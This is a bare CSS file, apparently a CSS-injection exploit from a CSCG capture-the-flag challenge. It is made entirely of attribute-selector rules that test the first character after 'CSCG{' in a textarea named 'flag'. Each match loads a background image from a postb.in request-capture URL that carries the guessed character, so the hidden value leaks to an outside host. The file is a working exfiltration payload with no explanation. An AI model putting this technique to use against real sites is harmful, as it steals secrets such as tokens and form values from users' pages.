textarea[name='flag'][value*='CSCG{a'] {background: url('https://postb.in/1584300535353-4666389247868?f=a');}
textarea[name='flag'][value*='CSCG{b'] {background: url('https://postb.in/1584300535353-4666389247868?f=b');}
textarea[name='flag'][value*='CSCG{c'] {background: url('https://postb.in/1584300535353-4666389247868?f=c');}
textarea[name='flag'][value*='CSCG{d'] {background: url('https://postb.in/1584300535353-4666389247868?f=d');}
textarea[name='flag'][value*='CSCG{e'] {background: url('https://postb.in/1584300535353-4666389247868?f=e');}
textarea[name='flag'][value*='CSCG{f'] {background: url('https://postb.in/1584300535353-4666389247868?f=f');}
textarea[name='flag'][value*='CSCG{g'] {background: url('https://postb.in/1584300535353-4666389247868?f=g');}
textarea[name='flag'][value*='CSCG{h'] {background: url('https://postb.in/1584300535353-4666389247868?f=h');}
textarea[name='flag'][value*='CSCG{i'] {background: url('https://postb.in/1584300535353-4666389247868?f=i');}
textarea[name='flag'][value*='CSCG{j'] {background: url('https://postb.in/1584300535353-4666389247868?f=j');}
textarea[name='flag'][value*='CSCG{k'] {background: url('https://postb.in/1584300535353-4666389247868?f=k');}
textarea[name='flag'][value*='CSCG{l'] {background: url('https://postb.in/1584300535353-4666389247868?f=l');}
textarea[name='flag'][value*='CSCG{m'] {background: url('https://postb.in/1584300535353-4666389247868?f=m');}
textarea[name='flag'][value*='CSCG{n'] {background: url('https://postb.in/1584300535353-4666389247868?f=n');}
textarea[name='flag'][value*='CSCG{o'] {background: url('https://postb.in/1584300535353-4666389247868?f=o');}
textarea[name='flag'][value*='CSCG{p'] {background: url('https://postb.in/1584300535353-4666389247868?f=p');}
textarea[name='flag'][value*='CSCG{q'] {background: url('https://postb.in/1584300535353-4666389247868?f=q');}
textarea[name='flag'][value*='CSCG{r'] {background: url('https://postb.in/1584300535353-4666389247868?f=r');}
textarea[name='flag'][value*='CSCG{s'] {background: url('https://postb.in/1584300535353-4666389247868?f=s');}
textarea[name='flag'][value*='CSCG{t'] {background: url('https://postb.in/1584300535353-4666389247868?f=t');}
textarea[name='flag'][value*='CSCG{u'] {background: url('https://postb.in/1584300535353-4666389247868?f=u');}
textarea[name='flag'][value*='CSCG{v'] {background: url('https://postb.in/1584300535353-4666389247868?f=v');}
textarea[name='flag'][value*='CSCG{w'] {background: url('https://postb.in/1584300535353-4666389247868?f=w');}
textarea[name='flag'][value*='CSCG{x'] {background: url('https://postb.in/1584300535353-4666389247868?f=x');}
textarea[name='flag'][value*='CSCG{y'] {background: url('https://postb.in/1584300535353-4666389247868?f=y');}
textarea[name='flag'][value*='CSCG{z'] {background: url('https://postb.in/1584300535353-4666389247868?f=z');}
textarea[name='flag'][value*='CSCG{A'] {background: url('https://postb.in/1584300535353-4666389247868?f=A');}
textarea[name='flag'][value*='CSCG{B'] {background: url('https://postb.in/1584300535353-4666389247868?f=B');}
textarea[name='flag'][value*='CSCG{C'] {background: url('https://postb.in/1584300535353-4666389247868?f=C');}
textarea[name='flag'][value*='CSCG{D'] {background: url('https://postb.in/1584300535353-4666389247868?f=D');}
textarea[name='flag'][value*='CSCG{E'] {background: url('https://postb.in/1584300535353-4666389247868?f=E');}
textarea[name='flag'][value*='CSCG{F'] {background: url('https://postb.in/1584300535353-4666389247868?f=F');}
textarea[name='flag'][value*='CSCG{G'] {background: url('https://postb.in/1584300535353-4666389247868?f=G');}
textarea[name='flag'][value*='CSCG{H'] {background: url('https://postb.in/1584300535353-4666389247868?f=H');}
textarea[name='flag'][value*='CSCG{I'] {background: url('https://postb.in/1584300535353-4666389247868?f=I');}
textarea[name='flag'][value*='CSCG{J'] {background: url('https://postb.in/1584300535353-4666389247868?f=J');}
textarea[name='flag'][value*='CSCG{K'] {background: url('https://postb.in/1584300535353-4666389247868?f=K');}
textarea[name='flag'][value*='CSCG{L'] {background: url('https://postb.in/1584300535353-4666389247868?f=L');}
textarea[name='flag'][value*='CSCG{M'] {background: url('https://postb.in/1584300535353-4666389247868?f=M');}
textarea[name='flag'][value*='CSCG{N'] {background: url('https://postb.in/1584300535353-4666389247868?f=N');}
textarea[name='flag'][value*='CSCG{O'] {background: url('https://postb.in/1584300535353-4666389247868?f=O');}
textarea[name='flag'][value*='CSCG{P'] {background: url('https://postb.in/1584300535353-4666389247868?f=P');}
textarea[name='flag'][value*='CSCG{Q'] {background: url('https://postb.in/1584300535353-4666389247868?f=Q');}
textarea[name='flag'][value*='CSCG{R'] {background: url('https://postb.in/1584300535353-4666389247868?f=R');}
textarea[name='flag'][value*='CSCG{S'] {background: url('https://postb.in/1584300535353-4666389247868?f=S');}
textarea[name='flag'][value*='CSCG{T'] {background: url('https://postb.in/1584300535353-4666389247868?f=T');}
textarea[name='flag'][value*='CSCG{U'] {background: url('https://postb.in/1584300535353-4666389247868?f=U');}
textarea[name='flag'][value*='CSCG{V'] {background: url('https://postb.in/1584300535353-4666389247868?f=V');}
textarea[name='flag'][value*='CSCG{W'] {background: url('https://postb.in/1584300535353-4666389247868?f=W');}
textarea[name='flag'][value*='CSCG{X'] {background: url('https://postb.in/1584300535353-4666389247868?f=X');}
textarea[name='flag'][value*='CSCG{Y'] {background: url('https://postb.in/1584300535353-4666389247868?f=Y');}
textarea[name='flag'][value*='CSCG{Z'] {background: url('https://postb.in/1584300535353-4666389247868?f=Z');}
textarea[name='flag'][value*='CSCG{0'] {background: url('https://postb.in/1584300535353-4666389247868?f=0');}
textarea[name='flag'][value*='CSCG{1'] {background: url('https://postb.in/1584300535353-4666389247868?f=1');}
textarea[name='flag'][value*='CSCG{2'] {background: url('https://postb.in/1584300535353-4666389247868?f=2');}
textarea[name='flag'][value*='CSCG{3'] {background: url('https://postb.in/1584300535353-4666389247868?f=3');}
textarea[name='flag'][value*='CSCG{4'] {background: url('https://postb.in/1584300535353-4666389247868?f=4');}
textarea[name='flag'][value*='CSCG{5'] {background: url('https://postb.in/1584300535353-4666389247868?f=5');}
textarea[name='flag'][value*='CSCG{6'] {background: url('https://postb.in/1584300535353-4666389247868?f=6');}
textarea[name='flag'][value*='CSCG{7'] {background: url('https://postb.in/1584300535353-4666389247868?f=7');}
textarea[name='flag'][value*='CSCG{8'] {background: url('https://postb.in/1584300535353-4666389247868?f=8');}
textarea[name='flag'][value*='CSCG{9'] {background: url('https://postb.in/1584300535353-4666389247868?f=9');}
textarea[name='flag'][value*='CSCG{!'] {background: url('https://postb.in/1584300535353-4666389247868?f=!');}
textarea[name='flag'][value*='CSCG{#'] {background: url('https://postb.in/1584300535353-4666389247868?f=#');}
textarea[name='flag'][value*='CSCG{$'] {background: url('https://postb.in/1584300535353-4666389247868?f=$');}
textarea[name='flag'][value*='CSCG{%'] {background: url('https://postb.in/1584300535353-4666389247868?f=%');}
textarea[name='flag'][value*='CSCG{&'] {background: url('https://postb.in/1584300535353-4666389247868?f=&');}
textarea[name='flag'][value*='CSCG{''] {background: url('https://postb.in/1584300535353-4666389247868?f='');}
textarea[name='flag'][value*='CSCG{('] {background: url('https://postb.in/1584300535353-4666389247868?f=(');}
textarea[name='flag'][value*='CSCG{)'] {background: url('https://postb.in/1584300535353-4666389247868?f=)');}
textarea[name='flag'][value*='CSCG{*'] {background: url('https://postb.in/1584300535353-4666389247868?f=*');}
textarea[name='flag'][value*='CSCG{+'] {background: url('https://postb.in/1584300535353-4666389247868?f=+');}
textarea[name='flag'][value*='CSCG{,'] {background: url('https://postb.in/1584300535353-4666389247868?f=,');}
textarea[name='flag'][value*='CSCG{-'] {background: url('https://postb.in/1584300535353-4666389247868?f=-');}
textarea[name='flag'][value*='CSCG{.'] {background: url('https://postb.in/1584300535353-4666389247868?f=.');}
textarea[name='flag'][value*='CSCG{/'] {background: url('https://postb.in/1584300535353-4666389247868?f=/');}
textarea[name='flag'][value*='CSCG{:'] {background: url('https://postb.in/1584300535353-4666389247868?f=:');}
textarea[name='flag'][value*='CSCG{;'] {background: url('https://postb.in/1584300535353-4666389247868?f=;');}
textarea[name='flag'][value*='CSCG{<'] {background: url('https://postb.in/1584300535353-4666389247868?f=<');}
textarea[name='flag'][value*='CSCG{='] {background: url('https://postb.in/1584300535353-4666389247868?f==');}
textarea[name='flag'][value*='CSCG{>'] {background: url('https://postb.in/1584300535353-4666389247868?f=>');}
textarea[name='flag'][value*='CSCG{?'] {background: url('https://postb.in/1584300535353-4666389247868?f=?');}
textarea[name='flag'][value*='CSCG{@'] {background: url('https://postb.in/1584300535353-4666389247868?f=@');}
textarea[name='flag'][value*='CSCG{['] {background: url('https://postb.in/1584300535353-4666389247868?f=[');}
textarea[name='flag'][value*='CSCG{\'] {background: url('https://postb.in/1584300535353-4666389247868?f=\');}
textarea[name='flag'][value*='CSCG{]'] {background: url('https://postb.in/1584300535353-4666389247868?f=]');}
textarea[name='flag'][value*='CSCG{^'] {background: url('https://postb.in/1584300535353-4666389247868?f=^');}
textarea[name='flag'][value*='CSCG{_'] {background: url('https://postb.in/1584300535353-4666389247868?f=_');}
textarea[name='flag'][value*='CSCG{`'] {background: url('https://postb.in/1584300535353-4666389247868?f=`');}
textarea[name='flag'][value*='CSCG{|'] {background: url('https://postb.in/1584300535353-4666389247868?f=|');}
textarea[name='flag'][value*='CSCG{}'] {background: url('https://postb.in/1584300535353-4666389247868?f=}');}
textarea[name='flag'][value*='CSCG{~'] {background: url('https://postb.in/1584300535353-4666389247868?f=~');}